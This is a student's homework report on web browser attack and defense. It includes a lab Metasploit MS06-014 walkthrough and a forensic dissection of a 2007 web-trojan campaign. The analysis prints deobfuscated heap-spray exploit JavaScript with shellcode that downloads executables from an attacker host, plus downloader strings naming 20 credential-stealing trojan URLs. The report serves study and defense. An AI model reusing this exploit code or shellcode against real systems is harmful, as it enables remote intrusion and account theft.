20199311 2019-2020-2《网络攻防实践》第12周做业

问题	回答
这个做业属于哪一个课程	https://edu.cnblogs.com/campus/besti/19attackdefense
这个做业的要求在哪里	https://edu.cnblogs.com/campus/besti/19attackdefense/homework/10756
我在这个课程的目标是	学习教材第十二章，了解Web浏览器安全攻防技术的相关知识
这个做业在哪一个具体方面帮助我实现目标	相关知识点和实践

1. 实践内容

1.1 Web浏览器的技术发展与安全威胁

1.1.1 Web 浏览器战争与技术发展

• 现代 Web 浏览器的基本结构与机理：现代Web浏览器指的是可以符合“现行标准"，而且被联网用户所接受使用的Web浏
  览器软件。
  

1.1.2 Web 浏览的安全问题与威胁

Web 浏览器做为目前互联网时代最为重要的软件产品，也正遭遇看咱们在第 10 章中已经介绍过的软件安全困境三要素的问题，即复杂性、可扩展性和连通性，从而使得 Web 浏览器软件与操做系统等大型系统软件同样，面临着严峻的安全问题与挑战。

• Web 浏览安全威胁位置：
  1. 针对传输网络的网络协议安全威胁
  2. 针对 Web 浏览端系统平台的安全威胁
  3. 针对 Web 浏览器软件及插件程序的渗透攻击威胁
  4. 针对互联网用户的社会工程学攻击威胁

1.2 Web浏览端的渗透攻击威胁——网页木马

1.2.1 网页木马安全机理分析

• 网页木马的定义特性：网页木马从本质特性上是利用了现代 Web 浏览器软件中所支持的客户端脚本执行能力，针对 Web 浏览端软件安全漏洞实施客户端渗透攻击， 从而取得在客户端主机的远程代码执行权限来植入恶意程序。
  网页木马是对 Web 浏览端软件进行客户端渗透攻击的一类恶意移动代码，一般以网页脚本语言如 JavaScript、 VBScirpt 实现，或以 Flash、 PDF 等恶意构造的 Web 文件形式存在，经过利用 Web 浏览端软件中存在的安全漏洞，得到客户端计算机的控制权限以植入恶意程序。

• 对网页木马机理的全方位分析与理解：与传统服务器端渗透攻击能够主动地进行网络扫描与攻击不一样，网页木马的攻击是被动式的，须要经过一些技术方法来诱使互联网用户来访问网页木马页面。此外在网页木马经过渗透攻击得到客户端计算机的远程代码执行权限以后，为了进行进一步的主机控制和敏感信息窃取， 通常须要植入一些盗号木马等类型的恶意程序。所以实施网页木马攻击不像传统服务器端渗透攻击那么简单，每每涉及较为复杂的多步骤攻击场景，并须要多种类型的恶意代码及网络资源。使得网页木马成为近年来最为复杂和难以应对的网络安全威胁类型的缘由以下

  1. 多样化的客户端渗透攻击位置和技术类型
  2. 分布式、复杂的微观连接结构
  3. 灵活多变的混淆与对抗分析能力

• 网页木马的本质核心一浏览器渗透攻击：网页木马的本质核心是利用 Web 浏览端软件安全漏洞的渗透攻击代码。

• 网页挂马机制：在编写完成网页木马渗透攻击代码以后，为了使得可以有终端用户使用他们可能存在安全漏洞的 Web 浏览端软件来访问网页木马，攻击者还须要将网页木马挂接到一些拥有客户访问流量的网站页面上，而这一过程就被称为网页挂马。网页挂马的机制不少，最主要的有以下四类策略。

  1. 内嵌 HTML 标签：第一类策略使用内嵌 HTML 标签，如 iframe 、frame 等，将网页木马连接嵌入到网站首页或其余页面中。
  2. 恶意 Script 脚本：第二类也是很经常使用的网页挂马策略是利用script 脚本标签经过外部引用脚本的方式来包含网贞木马， 例如 <script src="URL to Trojan">。
  3. 内嵌对象连接：第三类网页挂马策略利用图片、Flash 等内嵌对象中的特定方法来完成指定页面的加载，如 Flash 中的 LoadMovie() 方法等。
  4. ARP 欺骗挂马：在以上三类网站挂马策略基础上，攻击者还在使用一种危害度更高的策略——ARP 欺骗挂马。

• 混淆机制：除了引入中间跳转节点进行嵌套连接，并集成多种渗透攻击代码以外，网页木马攻击网络中还每每采用了大量的混淆技术，来对抗反病毒软件的检测，并提升反病毒工程师的分析难度，从而使得网页木马攻击网络更难被检测和摧毁，这些混淆技术也被称为“免杀”。目前在网页木马中使用比较普遍的混淆方法中要有

  1. 将代码从新排版，去除缩进、空行、换行、注释等，同时将网页木马中的变量名替换为一组合法的随机字符串，使其失去自我描述的能力，从而干扰阅读分析；
  2. 经过大小写变换、十六进制编码、escape 编码、unicode 编码等方法对网页木马进行编码混淆；
  3. 经过通用或定制的加密工具对网页木马进行加密获得密文，而后使用脚本语言中包含的解密函数，对密文进行解密，再使用 document.write() 或 eval() 进行动态输出或执行，此类混淆方法例如 XXTEA 网页加密工具；
  4. 利用字符串运算、数学运算或特殊函数能够混淆代码；
  5. 修改网页木马文件掩码欺骗反病毒软件，或对网页木马文件结构进行混淆，来假装正常文件，甚至将网页木马代码拆分至多个文件等；

1.2.2 网页木马的检测与分析技术

• 基于特征码匹配的传统检测方法：在网页木马做为一种新形态的恶意代码产生后， 反病毒软件公司仍延用恶意脚本代码静态分析过程来提取出其中具备样本特异性的特征码，而后在线更新手反病毒客户端软件中，使用传统的基于特征码检测方法来尝试从互联网用户上网浏览过程当中检测出网页木马。

• 基于统计与机器学习的静态分析方法：为应对网页木马广泛采用的代码混淆机制， 研究人员采用了多种统计与机器学习方法对混淆及行为特征进行检测，包括某于判断矩阵法的网页恶意脚本检测方法、基于静态启发式规则的检测方法、基于多异常语义特征加权的恶意网页检测方法以及基于分类算法的混淆恶意脚本检测方法等。

• 基于动态行为结果断定的检测分析方法：近年来为应对网页木马，最为有效的一种方式是基于动态行为结果断定的检测分析方法，这种方法利用了网页木马在攻击过程当中向互联网用户主机植入并激活恶意程序的行为特性，经过构建包含典型 Web 访问浏览器及应用软件、存有安全漏洞的高交互式客户端蜜罐环境，在蜜罐中访问待检测的网页，根据访问过程当中是否触发了新启动进程、文件系统修改等非预期系统状态变化，以断定当前访问页面中是否被挂接了网页木马。

• 基于模拟浏览器环境的动态分析检测方法：以脚本执行引擎（如 SpiderMonkey 开源 JavaScript 引擎）为核心，经过模拟实现 DOM 模型页面解析与渲染、ActiveX 等第三方控件构建出一个虚拟的低交互式客户端蜜罐环境，在该环境中进行网页脚本的动态解释执行，以此还原出网页木马在混淆以前的真实形态，并进一步结合反病毒引擎扫描、异常检测、全漏洞模拟与特征检测等方法对网页木马进行分析和检测。

1.2.3 网页木马防范措施

应对网贝木马最根本的防范措施与应对传统渗透攻击同样，就是提高操做系统与浏览端平台软件的安全性，能够采用操做系统自己提供的在线更新以及第三方软件所提供的经常使用应用软件更新机制，来确保所使用的计算机始终处于一种相对安全的状态。

1.3 揭开网络钓鱼的黑幕

网络钓鱼（Phishing）是社会工程学在互联网中普遍实施的一种典型攻击方式，经过大量发送声称来自于银行或其余知名机构的欺骗性垃圾邮件，意图引诱收信人给出我的敏感信息（如用户名、口令、帐号ID 、PIN 码或信用卡详细信息等）。

1.3.2 网络钓鱼攻击的技术内幕

• 网络钓鱼攻击技术策略：首先钓鱼攻击者须要架设支撑钓角攻击的底层基础设施：为了隐藏自已躲避执法部门的追踪，他们都是经过从互联网上寻找被攻陷服务器来搭建钓鱼攻击网络，他们每每扫描互联网的 IP 地址空间以寻找潜在的存有漏洞的主机，并攻陷那些缺少有效安全防御的服务器、甚至我的主机：有了服务器资源以后， 他们就开始在上面架设钓鱼网站，包栝假冒各类知名金融机构和在线电子商务网站的前台假冒钓鱼网站，以及后台用于收集、验证和发送用户输入敏感信息的脚本。在构建完毕钓鱼网站以后，钓鱼攻击者极大的挑战是如何欺骗大量的互联网用户访问钓鱼网站，除了技术层面上实施 DNS 中毒攻击或 Pharming 网络流量重定向以外，目前更常见的就是经过各类自动化的礼会工程学手段来构造欺骗性垃圾邮件或者信息，来实施撒网式的钓鱼攻击。
  1. 在指向假冒网站的连接中使用 IP 地址代替域名
  2. 注册发音相近或形似的 DNS 域名
  3. 一个假冒钓鱼网站的电子邮件 HTML 内容中嵌入一些指向真实的目标网站连接
  4. 对假冒网站的 URL 进行编码和混淆
  5. 企图攻击用户网页浏览器存在的漏洞，使之隐藏消息内容的实质
  6. 将假冒的钓鱼网站配置成记录用户提交的全部数据并进行不可察觉的日志，而后将用户重定向到真实的网站。
  7. 架设一个假冒网站， 做为目标机构真实网站的代理
  8. 经过恶意代码在受害者计算机上安装一个恶意的浏览器助手工具（Browser Helper Object），而后由其将受害者重定向到假冒的钓鱼网站
  9. 使用恶意代码去修改受害者计算机上的用来维护 DNS 域名和 IP 地址映射的本地
     hosts 文件

1.3.3 网络钓鱼攻击的防范

1. 针对网络钓鱼过程当中的电子邮件和即时通讯信息欺诈，应该提升警戒性；
2. 充分利用浏览器软件、网络安全厂商软件所提供的反钓鱼网站功能特性；
3. 在登陆网上银行、证券基金等关键网站进行在线金融操做时，务必要重视防问网站的真实性，不要点击邮件中的连接来访问这些网站，最好以直接访问域名方式来访问，尽可能使用硬件 U 盾来代替软证书或口令访问重要的金融网站；
4. 最为重要的是，经过学习和修炼提高本身抵抗社会工程学攻击的能力。

2. 实践过程

2.1 动手实践——Web 浏览器渗透攻击实验

任务： 使用攻击机和 Windows 靶机进行浏览器渗透攻击实验，体验网页木马构造及实施浏览器攻击的实际过程。
所需环境：

1. 攻击机： BT4 Linux攻击机或 Metasploit 渗透攻击框架软件；
2. 靶机：未打补丁的 Windows 靶机，可以使用 Windows 2KS 靶机或 Windows XP 靶机。
   实验步骤：
3. 选择使用 Metasploit 中的 MS06-014 渗透攻击模块 （ie_createobject） ；
4. 选择 PAYLOAD 为任意远程 Shell 链接；
5. 设置服务器地址（SVRHOST或LHOST）和 URL 参数，运行exploit，构造出恶意
   网页木马脚本：
6. 在靶机环境中启动浏览器，验证与服务器的连通性，并访问恶意网页木马脚木 URL；
7. 在攻击机的 Metasploit 软件中查看渗透攻击状态，并经过成功渗透攻击后创建起的远桯控制会话 SESSION, 在靶机上远程执行命令。

本次实验所使用的攻击机为 kail linux，靶机为 Windows 2KS，ip 地址以下表所示

主机名称	ip地址
kail	192.168.200.10
windows 2ks	192.168.200.124

这里利用的是 MS06-014 漏洞，该漏洞为 Windows 的 RDS.Dataspace ActiveX 实现上存在漏洞，远程攻击者可能利用此漏洞在获取主机的控制。在某些状况下，MDAC 所捆绑的 RDS.Dataspace ActiveX 控件没法确保可以进行安全的交互，致使远程代码执行漏洞，成功利用这个漏洞的攻击者能够彻底控制受影响的系统。

首先打开 msfconsole ，搜索这个漏洞

选择漏洞，搜索可用载荷

选择第50号载荷 windows/meterpreter/reverse_tcp，设置载荷，使用show options查看所须要配置的项

设置服务器地址LHOST为攻击机地址192.168.200.10，expilot运行

能够看到恶意木马脚本构形成功，而且生成了一个 URL http://192.168.200.10:8080/WSR0TBBr
接下来打开靶机，在靶机上 ping 服务器，发现能够 ping 通，说明与服务器连通性正常

而后打开浏览器，访问http://192.168.200.10:8080/WSR0TBBr

回到攻击机，能够看到攻击机与靶机创建了一个 session 对话

这表明咱们在靶机上成功的得到了 Meterpreter 的 Shell
而后使用命令sessions -l查看咱们控制的主机

使用命令sessions -i 1选择控制咱们攻陷的靶机，并经过ipconfig命令查看靶机的ip地址

能够看到与在靶机上查看到ip地址的一致

至此实验完成

2.2 取证分析实践： 剖析一个实际的网页木马攻击场景

案例分析挑战内容： 2007 年 10 月，北京大学计算机科学技术研究所信息安全工程研究中心蜜网课题组的成员在进行分析中国万维网挂乃网站的采样分析时， 发现了 个域名为 I8dd.net 的庞大的木马宿主站点。 在连接分析的过程当中， 发现有大量恶意网页最终都重定向到了这个站点上，这在所有的宿主站点中排名第一。 进一步的研究分析代表， 这个站点的恶意代码入口是 http://aa.l8dd.net/ww/new09.htm文件。 如今你的任务是根据给出的说明逐步分析， 获得最终的木马文件的内容。
这个挂马网站如今已经没法访问了， 但蜜网课题组的成员保留了最初作分析时所们的原始文件。首先你应该访问 start.html，在这个文件中给出了 new09.htm 的地址， 在进入 new09.htm 后， 每解密出一个文件地址， 请对其做 32 位 MD5 散列，以散列值为文件名到http://netsec.ccet1.ed.enu/hacking/目录（或者附偌资料中的解压缩数据目录）下去下载对应的文件（注意： 文件名中的英文字母为小写， 且没有扩展名），即为解密出的地址对应的文件。若是解密出的地址给出的是网页或脚本文件，请继续解密；若是解密出的地址是二进制程序文件，请进行静态反汇编或动态调试。重复以上过程直到这些文件被所有分析完成。请注意：被散列的文件地址应该是标准的 URL 形式， 形如http://xxl8dd.net/a/b.htm，不然会致使散列值计算不正确而没法继续。
问题：

1. 试述你是如何一步步地从所给的网页中获取最后的真实代码的？
2. 网页和 JavaScript 代码中都使用了什么样的加密方法？你是如何解密的？
3. 从解密后的结果来看，攻击者构造的网页木马利用了哪些安全漏洞？
4. 解密后发现了多少个可执行文件？这些可执行文件中有下载器么？若是有，它们下载了哪些程序？这些程序又是起什么做用的？（请举例分析）

分析过程

因为题目中所给的 URL http://192.168.68.253/scom/start.html没法打开也没法下载（所给资料中也没有），那么就没法找到 new09.htm 文件，固然也没法进行下一步分析，不得已只好按照指导书进行下面的内容

打开 new09.htm 咱们能够获得两个连接http://aa.18dd.net/aa/kl.htm http://js.users.51.la/1299644.js，分别计算它们的MD5值

分别为7f60672dcd6b5e90b6772545ee219bd3和23180a42a2ff1192150231b44ffdf3d3，从老师所给资料中的hashed文件夹中找到这两个文件

能够发现第一个文件有11kb，第二个文件不到1kb，先看第二个文件

这显然不是咱们所须要的内容，那么打开第一个文件

由倒数第三行t=utf8to16(xxtea_decrypt(base64decode(t), '\x73\x63\x72\x69\x70\x74'));咱们知道这个文件使用了一种
被称为 XXTEA+Base64 的加密方法，对付这种加密方法，咱们只要找到它的加密密钥便可。固然这个xxtea_decrypt函数的第二个参数就是密钥，不过也是被加密过的，可是仅仅是一种16进制加密。转换一下便可获得密钥

能够看到密钥为script
指导书中所给的 xxtea 在线解密网站已经不能用了，这里能够用xxtea在线解密网站来解密，输入密文和密钥，点击解密，便可获得结果

这里加密者又用到了另外一种加密方式，也就是十六进制加密，对引号内的内容解密，获得以下结果，将结果保存

分析这段代码，能够看到它利用了应用程序漏洞有“Adodb.Stream”、“MPS.StormPlayer”、“POWERPLAYER.PowerPlayerCtrl.1”和“BaiduBar.Tool”，分别对应利用了微软数据库访问对象、暴风影音、PPStream 和百度搜霸的漏洞。
另外，这个文件还引用三个 js 文件和一个压缩包（bd.cab，解开后是bd.exe）
根据分析结果，对http://aa.18dd.net/aa/1.js、http://aa.18dd.net/aa/b.js、http://aa.18dd.net/aa/pps.js和http://down.18dd.net/bb/bd.cab做处理
一样计算md5的值，过程同上，能够分别获得它们的MD5值

连接	MD5值
http://aa.18dd.net/aa/1.js	5d7e9058a857aa2abee820d5473c5fa4
http://aa.18dd.net/aa/b.js	3870c28cc279d457746b3796a262f166
http://aa.18dd.net/aa/pps.js	5f0b8bf0385314dbe0e5ec95e6abedc2
http://down.18dd.net/bb/bd.cab	1c1d7b3539a617517c49eee4120783b2

同理，到hashed文件夹中找到这四个文件，保存

首先来看1.js也就是 5d7e9058a857aa2abee820d5473c5fa4

仍是一个十六进制加密，解开可得

这个文件前面部分下载了一个http://down.18dd.net/bb/014.exe的可执行文件，后面部分则是对ADODB漏洞的继续利用。
先将这个exe文件放到一边，咱们先来看b.js，也就是3870c28cc279d457746b3796a262f166文件

这段代码看起来让人至关头痛，不过好在第一行的函数的参数（p，a，c，k，e，d）给了咱们提示，连起来是“packed”。上网搜索，这实际上是一个混淆工具。下面咱们在这个网站在线js美化来还原代码

还原后的代码以下所示

var bigblock = unescape("%u9090%u9090");
var headersize = 20;
var shellcode = unescape("%uf3e9%u0000" + "%u9000%u9090%u5a90%ua164%u0030%u0000%u408b%u8b0c" + "%u1c70%u8bad%u0840%ud88b%u738b%u8b3c%u1e74%u0378" + "%u8bf3%u207e%ufb03%u4e8b%u3314%u56ed%u5157%u3f8b" + "%ufb03%uf28b%u0e6a%uf359%u74a6%u5908%u835f%ufcef" + "%ue245%u59e9%u5e5f%ucd8b%u468b%u0324%ud1c3%u03e1" + "%u33c1%u66c9%u088b%u468b%u031c%uc1c3%u02e1%uc103" + "%u008b%uc303%ufa8b%uf78b%uc683%u8b0e%u6ad0%u5904" + "%u6ae8%u0000%u8300%u0dc6%u5652%u57ff%u5afc%ud88b" + "%u016a%ue859%u0057%u0000%uc683%u5613%u8046%u803e" + "%ufa75%u3680%u5e80%uec83%u8b40%uc7dc%u6303%u646d" + "%u4320%u4343%u6643%u03c7%u632f%u4343%u03c6%u4320" + "%u206a%uff53%uec57%u04c7%u5c03%u2e61%uc765%u0344" + "%u7804%u0065%u3300%u50c0%u5350%u5056%u57ff%u8bfc" + "%u6adc%u5300%u57ff%u68f0%u2451%u0040%uff58%u33d0" + "%uacc0%uc085%uf975%u5251%u5356%ud2ff%u595a%ue2ab" + "%u33ee%uc3c0%u0ce8%uffff%u47ff%u7465%u7250%u636f" + "%u6441%u7264%u7365%u0073%u6547%u5374%u7379%u6574" + "%u446d%u7269%u6365%u6f74%u7972%u0041%u6957%u456e" + "%u6578%u0063%u7845%u7469%u6854%u6572%u6461%u4c00" + "%u616f%u4c64%u6269%u6172%u7972%u0041%u7275%u6d6c" + "%u6e6f%u5500%u4c52%u6f44%u6e77%u6f6c%u6461%u6f54" + "%u6946%u656c%u0041%u7468%u7074%u2f3a%u642f%u776f%u2e6e%u3831%u6464%u6e2e%u7465%u622f%u2f62%u6662%u652e%u6578%u0000");
var slackspace = headersize + shellcode.length;
while (bigblock.length < slackspace) bigblock += bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length - slackspace);
while (block.length + slackspace < 0x40000) block = block + block + fillblock;
memory = new Array();
for (x = 0; x < 300; x++) memory[x] = block + shellcode;
var buffer = '';
while (buffer.length < 4068) buffer += "\x0a\x0a\x0a\x0a";
storm.rawParse(buffer)

这里出现了关键字 shellcode ，是二进制的机器码，下面分析这个 shellcode
这个 shellcode 并不长，但它要实现不少破坏，不可能把全部的病毒都写在里面。所以它极可能就是下载器。对于一个下载器来讲，必不可少的一项内容就是要下载的内容的 URL，咱们能够找一找这加密的代码里有 URL 特征的字符串。
URL 中必然会出现的斜线/，/的十六进制 ASCII 码是2F，那么咱们就在这段shellcode 中找/。查找结果以下（高亮处）

这里能够看到后四个2f比较密集，很可疑。那么咱们取第三个2f到末尾的内容
（这里指导书上给的解密工具一样不能用了，能够采用 FreShow 和16进制转换结合解密）

能够获得一个不彻底的网址://down.18dd.net/bb/bf.exe，将它补充完整http://down.18dd.net/bb/bf.exe
又是一个可执行文件，先放一放。看下一个 js 文件 pps.js ，也就是5f0b8bf0385314dbe0e5ec95e6abedc2文件，打开查看

此次变成了八进制转换，解密，结果以下

/*%u66c9%u088b%u468b%u031c%uc1c3%u02e1%uc103" +
"%u008b%uc303%ufa8b%uf78b%uc683%u8b0e%u6ad0%u5904" +
"%u6ae8%u0000%u8300%u0dc6%u5652%u57ff%u5afc%ud88b" +
"%u016a%ue859%u0057%u0000%uc683%u5613%u8046%u803e" +
"%ufa75%u3680%u5e80%uec83%u8b40%uc7dc%u6303%u646d" +
"%u4320%u4343%u6643%u03c7%u632f%u4343%u03c6%u4320" +
"%u206a%uff53%uec57%u*/
pps=(document.createElement("object"));
pps.setAttribute("classid","clsid:5EC7C511-CD0F-42E6-830C-1BD9882F3458")
var shellcode = unescape("%uf3e9%u0000"+
"%u9000%u9090%u5a90%ua164%u0030%u0000%u408b%u8b0c" +
"%u1c70%u8bad%u0840%ud88b%u738b%u8b3c%u1e74%u0378" +
"%u8bf3%u207e%ufb03%u4e8b%u3314%u56ed%u5157%u3f8b" +
"%ufb03%uf28b%u0e6a%uf359%u74a6%u5908%u835f%u04c7" +
"%ue245%u59e9%u5e5f%ucd8b%u468b%u0324%ud1c3%u03e1" +
"%u33c1%u66c9%u088b%u468b%u031c%uc1c3%u02e1%uc103" +
"%u008b%uc303%ufa8b%uf78b%uc683%u8b0e%u6ad0%u5904" +
"%u6ae8%u0000%u8300%u0dc6%u5652%u57ff%u5afc%ud88b" +
"%u016a%ue859%u0057%u0000%uc683%u5613%u8046%u803e" +
"%ufa75%u3680%u5e80%uec83%u8b40%uc7dc%u6303%u646d" +
"%u4320%u4343%u6643%u03c7%u632f%u4343%u03c6%u4320" +
"%u206a%uff53%uec57%u04c7%u5c03%u2e61%uc765%u0344" +
"%u7804%u0065%u3300%u50c0%u5350%u5056%u57ff%u8bfc" +
"%u6adc%u5300%u57ff%u68f0%u2451%u0040%uff58%u33d0" +
"%uacc0%uc085%uf975%u5251%u5356%ud2ff%u595a%ue2ab" +
"%u33ee%uc3c0%u0ce8%uffff%u47ff%u7465%u7250%u636f" +
"%u6441%u7264%u7365%u0073%u6547%u5374%u7379%u6574" +
"%u446d%u7269%u6365%u6f74%u7972%u0041%u6957%u456e" +
"%u6578%u0063%u7845%u7469%u6854%u6572%u6461%u4c00" +
"%u616f%u4c64%u6269%u6172%u7972%u0041%u7275%u6d6c" +
"%u6e6f%u5500%u4c52%u6f44%u6e77%u6f6c%u6461%u6f54" +
"%u6946%u656c%u0041%u7468%u7074%u2f3a%u642f%u776f%u2e6e%u3831%u6464%u6e2e%u7465%u622f%u2f62%u7070%u2e73%u7865%u0065");
var bigblock = unescape("%u9090%u9090");
var headersize = 20;
var slackspace = headersize+shellcode.length;
while (bigblock.length<slackspace) bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace<0x40000) block = block+block+fillblock;
memory = new Array();
for (x=0; x<400; x++) memory[x] = block + shellcode;
var buffer = '';
while (buffer.length < 500) buffer+="\x0a\x0a\x0a\x0a";
pps.Logo = buffer

一样是 shellcode ，与上述过程同理，能够解密出以下 URL http://down.18dd.net/bb/pps.exe
最后一个压缩文件将其解压缩，能够获得bd.exe执行文件，计算将前三个可执行文件的 URL 的 MD5 值，以下表所示

连接	MD5值
http://down.18dd.net/bb/014.exe	ca4e4a1730b0f69a9b94393d9443b979
http://down.18dd.net/bb/bf.exe	268cbd59fbed235f6cf6b41b92b03f8e
http://down.18dd.net/bb/pps.exe	ff59b3b8961f502289c1b4df8c37e2a4

因而咱们有了四个可执行文件，即 014.exe，bf.exe，pps.exe，bd.exe，将其保存会发现，这四个文件的大小是相同的

校验这四个文件的 MD5 值，会发现竟然是相同的（1290ecd734d68d52318ea9016dc6fe63）

结合上述分析，说明这四个可执行文件是相同的，那么分析其中一个就能够了，下面就是咱们前面实验所作过的分析一个病毒程序了，那么按照流程，咱们先来检验它是否加壳，这里使用 peid 工具

能够看到这个程序是由 Delphi 写得，同时可使用 DeDe 来验证一下

果不其然是这样，接下来使用反汇编工具 W32DAsm 反汇编这个程序，首先来看一下字符串（这里没有办法放大，只好把它复制出来）

" goto try"
"#32770"
"(T@"
",T@"
".1
"
":\AutoRun.inf"
":try"
"[AutoRun]
open="
"\program files\internet explorer\IEXPLORE.EXE"
"0813"
"3烂怱VQ嬝媠咑u3离&j"
"60000"
"advapi32.dll"
"Alletdel.bat"
"AutoRun.inf"
"Button"
"ChangeServiceConfig2A"
"ChangeServiceConfig2W"
"cmd /c date "
"cmd /c date 1981-01-12"
"del ""
"del %0"
"drivers/klif.sys"
"Error"
"FPUMaskValue"
"http://down.18dd.net/kl/0.exe"
"http://down.18dd.net/kl/1.exe"
"http://down.18dd.net/kl/10.exe"
"http://down.18dd.net/kl/11.exe"
"http://down.18dd.net/kl/12.exe"
"http://down.18dd.net/kl/13.exe"
"http://down.18dd.net/kl/14.exe"
"http://down.18dd.net/kl/15.exe"
"http://down.18dd.net/kl/16.exe"
"http://down.18dd.net/kl/17.exe"
"http://down.18dd.net/kl/18.exe"
"http://down.18dd.net/kl/19.exe"
"http://down.18dd.net/kl/2.exe"
"http://down.18dd.net/kl/3.exe"
"http://down.18dd.net/kl/4.exe"
"http://down.18dd.net/kl/5.exe"
"http://down.18dd.net/kl/6.exe"
"http://down.18dd.net/kl/7.exe"
"http://down.18dd.net/kl/8.exe"
"http://down.18dd.net/kl/9.exe"
"IE 执行保护"
"IEXPLORE.EXE"
"IE执行保护"
"if exist ""
"Kernel32.dll"
"NoDriveTypeAutoRun"
"ntdll.dll"
"QueryServiceConfig2A"
"QueryServiceConfig2W"
"S@"
"serdst.exe"
"shell\Auto\command="
"shellexecute="
"SOFTWARE\Borland\Delphi\RTL"
"Software\Microsoft\Windows\CurrentVersion\Poli"
"Telephotsgoogle"
"U嬱兡餝VW3繳h訹@"
"U嬱筧"
"U嬱伳SVW?"
"ZwUnmapViewOfSection"
"刌@"
"銼@"
"婦$鰼"
"媩$(?"
"燬@"
"擮@"
"肯定"
"媆$?搡?婼婥t?燖"
"瑞星卡卡上网安全助手 - IE防漏墙"
"为即插即用设备提供支持"
"圷@"
"容许"
"容许执行"

分析这些字符串：

1. 由字符串" goto try"，":try"，"Alletdel.bat"，"cmd /c date "，"cmd /c date 1981-01-12"，"del ""，"del %0"，"if exist "，猜想这个程序可能生成一个叫"Alletdel.bat"的批处理文件，这个文件中有一个标签叫"try"，批处理文件会不断的执行这个标签下一行的命令，命令内容多是判断文件存在性，更改系统日期，删除某些文件
2. 由":\AutoRun.inf"，"[AutoRun] open="，"AutoRun.inf"，"shell\Auto\command="，猜想这个程序可能在磁盘根目录下生成自动运行的文件，以使得用户在不当心时启动程序
3. 由"advapi32.dll"，"drivers/klif.sys"，"\program files\internet explorer\IEXPLORE.EXE"，"IE 执行保护"，"IEXPLORE.EXE"，"Software\Microsoft\Windows\CurrentVersion\Poli"，"Kernel32.dll"，"SOFTWARE\Borland\Delphi\RTL"，"ChangeServiceConfig2A"，"ChangeServiceConfig2W"，"QueryServiceConfig2A"，"QueryServiceConfig2W"等能够猜想程序可能会
   修改IE、注册表、服务和系统文件
4. 由"瑞星卡卡上网安全助手 - IE防漏墙"，"容许"，"容许执行"，可知这个程序有必定的防系统保护软件的能力，
5. 由20个可执行文件的 URL 猜想程序要下载一大堆木马
6. 由“为即插即用设备提供支持”可知要创建服务

下面动态分析这个程序，使用的监视工具为 Process Monitor、SysInspector、Total Uninstall
首先使用 SysInspector 生成运行程序前的系统日志，运行 bd.exe 以后，再次生成一个系统日志，而后点比较日志，能够获得以下结果

能够看到有两处变化

1. 在系统文件夹（system32）下建立了一个 serdst.exe 的文件。经MD5检查，该文件就是这个可执行文件。
2. 安装了一个服务。服务名为“Wdswsdewn”，显示名为"Telephotsgoogle"

不过在服务创建后并无什么事情发生......，我的猜想是下载器（bd.exe）中的 URL 已经失效了，不过好在资料中给出了这 20 个执行文件，咱们能够直接在这里分析

以4.exe为例，一样重复上述步骤，首先使用 W32Dasm 反汇编，查看字符串，获得以下结果

""
"" goto Loop
del %0
"
"" -r -a -s -h
del ""
""
if exist ""
"%d"
".bat"
".mod"
":Loop
"
"@echo off
"
"\"
"\InprocServer32"
"^B*"
"{28907901-1416-3389"
"1"
"-9981-372178569982}"
"a"
"Apartment"
"asktao"
"attrib ""
"C:\DFD"
"CLSID\"
"EnHookWindow"
"enweafx.fon"
"Fonts\"
"id.exe"
"kawdacs.dll"
"kawdazy.d"
"kawdbaz.exe"
"kawdbzy.dll"
"ll"
"MP3"
"Music"
"q@ı"
"Send"
"Software\Microsoft\Windows\CurrentVersion\expl"
"S鐻?吚t嬝覽?
"ThreadingModel"
"Url%d"
"Url1"
"U嬱S瑙?嬝杓铔?+?? "
"vercls"
"wddpri.d"
"獲ı"
"嬂%Q@"

从上面很难推出不少信息，主要能够看到这个病毒可能要生成一个批处理文件并进行删除文件操做，由于"goto Loop del %0"，" -r -a -s –h del "，"if exist "， ":Loop"，"@echo off"，"attrib ""这些内容都是批处理文件中的字符串。同时其中还有ClassID 标识、注册表键值和一些文件名。

接下来使用 SysInspector 进行动态分析，先生成程序运行前的日志，程序运行后再生成一份日志，将其比较，查看结果

生成了一些文件，包括kawdbaz.exe，kawdbzy.dll等，同时删除了verclsid.exe
更改了一些注册表项目，主要是设置了一个钩子，加载了一个启动DLL，另外把Windows的自动更新功能给禁用了。
能够看到这个程序给 explorer.exe 程序和中被注入了动态连接库 kawdbzy.dll。而实际上，除了病毒的主程序文件 kawdbaz.exe 的进程外，Process Monitor、vmtool、SysInspector本身的进程中都被注入了该DLL。
固然凭借这些分析咱们仍是很可贵出这些软件是干什么的，不过能够借用 360 软件来分析一下，这个程序是一个盗号木马

其它19个程序分析过程同理，运行结果基本上大同小异，能够肯定这20个程序均是盗号木马

问题解答
试述你是如何一步步地从所给的网页中获取最后的真实代码的？
见上述分析过程

网页和 JavaScript 代码中都使用了什么样的加密方法？你是如何解密的？
使用了8进制，16进制，js 混淆，xxtea + base64加密，二进制机器码加密等。解密过程见上述分析过程

从解密后的结果来看，攻击者构造的网页木马利用了哪些安全漏洞？

• MS06-014网马
  • 攻击MS06-014安全漏洞
  • MDAC RDS.Dataspace ActiveX控件远程代码执行漏洞
• 暴风影音网马
  • 攻击CVE-2007-4816安全漏洞
  • 暴风影音2 mps.dll组件多个缓冲区溢出漏洞
• PPStream网马
  • 攻击CVE-2007-4748安全漏洞
  • PPStream 堆栈溢出
• 百度搜霸网马
  • 攻击CVE-2007-4105安全漏洞
  • 百度搜霸ActiveX控件远程代码执行漏洞

解密后发现了多少个可执行文件？这些可执行文件中有下载器么？若是有，它们下载了哪些程序？这些程序又是起什么做用的？（请举例分析）
解密后发现了4个可执行文件，这四个可执行文件内容相同，都是下载器，下载了20个程序。这些程序的做用是盗取用户的帐号。

2.3 攻防对抗实践： Web 浏览器渗透攻击攻防对抗

攻击方使用 Metasploit 构造出攻击至少两个不一样 Web 浏览端软件安全漏洞的渗透攻击代码，并进行混淆处理组装成一个URL连接，经过具备欺骗性的电子邮件发送给防守方。
防守方对电子邮件中的挂马连接进行提取、解混淆分析，尝试恢复出渗透攻击代码的原始形态， 并分析出这些渗透代码都是攻击哪些 Web 浏览端软件的哪些安全漏洞。
双方撰写详细实验分析报告， 对攻防对抗过程进行总结。

这个实验所使用攻击机为 kail，靶机为 win 2kS
攻击方
构建漏洞的过程如第一个实践所示，这里不赘述了。

